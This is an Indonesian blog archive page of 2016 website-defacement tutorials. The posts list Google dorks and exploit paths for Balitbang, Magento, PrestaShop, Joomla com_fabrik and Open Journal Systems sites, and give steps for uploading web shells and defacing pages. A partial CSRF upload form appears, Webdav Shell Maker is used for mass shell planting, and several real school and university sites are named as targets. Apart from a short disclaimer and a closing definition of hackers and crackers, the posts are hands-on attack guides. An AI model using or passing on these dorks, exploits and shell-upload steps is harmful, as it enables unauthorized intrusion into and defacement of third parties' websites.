Posts

Showing posts from July, 2016

Deface Dengan CSRF Balitbang

Image
Selamat malam sobat bloggers, kali ini saya mau share tutorial Deface dengan CSRF Balitbang , ok langsung saja ;) Bahan - Bahan : - CSRF :  Script CSRF Balitbang ( Copy, lalu paste dinotepad, dan save dengan extensi file ' .html ' / ' .htm '  - Email yang masih aktif - Wajah ganteng :p  Langkah - Langkah :  1. Pertama-tama kita cari dulu targetnya di google, dengan dork berikut : inurl:/member/daftar.php 2. Setelah menemukan targetnya, kita klik target tersebut, dan masukin exploit berikut : /member/daftar.php Contoh : http://site.sch.id/member/daftar.php 3. Maka tampilannya akan seperti ini :  4. Lalu isikan kotak yang kosong itu, dan klik Daftar / Simpan 5. Setelah kita klik Daftar / Simpan, maka tampilannya akan seperti ini : 6. Setelah itu kita buka email kita ( email yang tadi buat daftar jadi member ) 7. Lalu lihat di Kotak Masuk / di SPAM, lalu kita klik Validasi Member 8. Setelah kita mengklik Validasi Member, maka tampilannya akan seperti ini :  ...

Deface Teknik Add Topic School

Image
Kali Ini Gua Mau Share , Gimana Cara Deface Teknik Add Topic School ? Okey , Sudah Siap ? :v Dork :   Intext:Welcome to our electronic class yearbook Exploit :   /forum_topic_create.php?forumid=1 File :   Kata-Kata Apa-Aja , Simpan Dengan Ex.txt Tutorial ? Lihat HD Aja -,- Di Sini >    http://adf.ly/1bpGEr Terima Kasih :*

Deface Teknik Magento Add Admin

Image
Haiii Gan , Kali Ini Gua Mau Share Nih :v Cara Ini Sering Di Gunakan Para Lamar's Atau Para Defacer's ! Apaan Sih UntungNya Tutorial Pada Kali Ini ??? * Bisa Jadi Admin Website CMS Magento ! * Ancurin Web CMS Magento :v Dork : - intext:/skin/adminhtml/default/default/ - intitle:computer inurl:account/login/ site:.com - intitle:computer inurl:account/login/create/ site:.com - intext:"2016" inurl:account/login site:.com - "shirt" inurl:customer/account/login/ site:.com - "jeans" inurl:account/login site:.com - intitle:shop inurl:account/login/create site:.com - intext:2016 inurl:customer/account/ site:.com Okey , Langsung Aja Yahhh :v 1. Cari Website Yang Ber-CMS Magentot *Eh Magento MaksudNya :v 2. Cari Dulu Tempat Admin LoginNya !    = localhost / admin /    = localhost / index.php / admin / 3. Jika Ada Admin Login Tersebut , Pergi Ke :   http://adf.ly/1bpFqF 4. Masukan Website Target Lu Di Situ!    = http://localhost/index.php/    = http://l...

Deface Teknik Prestashop File Upload

Image
Hallo Guys , Gua Mau Share Tutorial Untuk Deface Terbaru Nih , Maksudnya Tutorial Ini Saya Baru Tau :v Dork :     Inurl:"/modules/columnadverts/"    Inurl:"/modules/homepageadvertise/"    Inurl:"/modules/productpageadverts/"    Inurl:"/modules/simpleslideshow/"    Inurl:"/modules/vtemslideshow/"    Index Of "/modules/columnadverts/"    Index Of "/modules/homepageadvertise/"    Index Of "/modules/productpageadverts/"    Index Of "/modules/simpleslideshow/"    Index Of "/modules/vtemslideshow/" Exploit  http://loclahost/ modules/ columnadverts /uploadimage.php  http://localhost/ modules/ homepageadvertise /uploadimage.php  http://localhost/ modules/ productpageadverts /uploadimage.php  http://localhost/ modules/ simpleslideshow /uploadimage.php  http://localhost/ modules/ vtemslideshow /uploadimage.php CSRF :  <form method="POST" act...

Tutorial Deface Website Dengan Webdav Shell Maker | Hmei7

Image
ASSALAMU'ALAIKUM Wr.Wb Ok deh langsung saja ke inti postingan kali ini, o'ya! disini saya hanya memberikan tutorial untuk pembelajaran. Bukan sok2'an jadi  heker , cracker ,  ceker  atau apalah, saya hanya ingin berbagi karena Berbagi Itu Indah ( Mbah Qopet's Quote ) :p Dengan menggunakan sebuah tools hacking buatan  Hmei7  kita dapat dengan mudah menanam shell ke dalam sebuah website, dan dengan begitu kita dapat melakukan apa saja terhadap web yang kita tanami shell tersebut. Sebelumnya soba harus mendowload tools Webdav Shell Maker'nya. Dibawah sudah saya siapkan link downloadnya. Download Link : Webdav Shell Maker: Tusfiles  | 70KB Shell  | 10 KB Tutorial Deface Web dengan Webdav Shell Maker : 1). Download kemudian extract file  ls-rootkit.Rar 2). Buka tools webdav yang sudah di download tadi, klik menu tab 'WebDav' lalu pilih 'Asp shell maker'. 3). Buka menu Setting, pada menu setting  Name of your shell  bisa diubah dengan nam...

Deface Web Sekali Banyak | Webdav

Image
Ini adalah materi pertama pembahasan kita ... Kita akan belajar cara "Deface Web Sekali Banyak dengan menggunakan Tool Webdav Shell Maker"  Sebelumnya saya minta maaf karena harus mengambil sumber dari blog lain dikarenakan jaringan disini lagi down :( TOOLS :   Webdav Shell Maker: Tusfiles  | 70KB *silahkan download jika belum punya Script Deface Standar i-CAT : Tusfiles | 427KB *silahkan edit script ini jika belum punya script pribadi Vuln Sites: Tusfiles | 4KB *silahkan gunakan sites yg sudah disediakan jika anda belum bisa menemukan sites yg bisa dideface dgn cara dibawah Ok sekarang kita siap beraksi.   kita cari target vuln webdav dulu dengan menggunakn dork,ketikan dork ini digoogle  inurl:/Hmei7.asp;txt site:com   lalu search kita akan mendapat hasil seperti dibawah,, yang saya beri tanda itu sebagai contoh target,   wlax.4wmt.com   copy alamatnya lalu masuk ke  http://www.yougetsignal.com/tools/web-sites-on-web-server/   dan p...

Cara Deface Website Dengan Exploit Com_Fabrik

Image
Cara Deface Web Dengan Exploit Com Fabrik - Masih membahas tentang deface. Cara yang satu ini cukup mudah dilakukan. Dengan menggunakan exploit com_fabrik, kita bisa mengupload shell kita untuk melakukan deface terhadap web tersebut. Ok simak tutorial berikut. 1. Ketik dork berikut ke google :  inurl:index.php?option=com_fabrik 2. Akan ada banyak web, anda buka terserah yang mana 3. Masukkan exploit ini :  index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 Contoh : http://www.avismacerata.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1 4. Jika tidak berhasil cari target lain. Jika berhasil akan muncul form upload seperti ini 5. Klik "pilih file" untuk memilih shell, dan klik "Import CSV untuk mengupload 6. Jika berhasil, buka shell anda dengan format   http://www.avismacerata.it/media/namashell.php 7. Dan muncullah shell kesayangan anda. Namun jika tidak muncul, itu karena web tersebut tid...

Dengan Website Dengan OJS ( Open Journal System )

Image
Selamat siang semua :D kali ini saya akan berbagi tutorial deface yang lagi tren yaitu Open Journal Systems (OJS) dengan target kebanyakan website Universitas di Indonesia. Dorknya : inurl:/index.php/index/user/register *kembangin lagi biar jos :D Yang harus disiapkan yaitu sebuah shell dengan ukuran kecil seperti Galerz / IndoXploit yang ekstensinya diubah menjadi .phtml, Contoh : lerz.phtml / ix.phtml. Live Target kali ini adalah  Universitas Jember  beralamat : http://www.haujournal.org/index.php/index/user/register Pertama pilih journal untuk register, saya akan pilih yang  paling  atas. Kemudian isi form yang hanya diberi tanda * untuk mempercepat. Lalu dibagian bawah jadikan centang seperti  berikut. Kemudian klik register. Dibagian ini klik New Submission yang ada disebelah kanan. Centang semua seperti gambar kemudian klik save and continue. Kemudian upload shell kalian yang berekstensi .phtml Ingat File Name shell kalian dan pada bagian depan ...

Pengertian Haking

Image
Hacking adalah Seorang Hacker yang seharusnya tidak mempunyai hak atas suatu sistem menjadi mempunyai hak penuh dari sistem tersebut. Pada intinya Hacking itu kegiatan yang menjebol atau masuk ke dalam sebuah sistem tanpa diketahui oleh si Admin. 1. Hacker Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer.Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya. 2. Cracker Cracker adalah sebutan untuk mereka yang masuk ke sistem orang lain dan cracker lebih bersifat destruktif, biasanya di jaringan komputer, mem-bypass password atau lisensi program komputer, secara sengaja melawan keamanan komputer, men-deface (merubah halaman muka web) milik orang lain bahkan hingga men-delete data orang lain, m...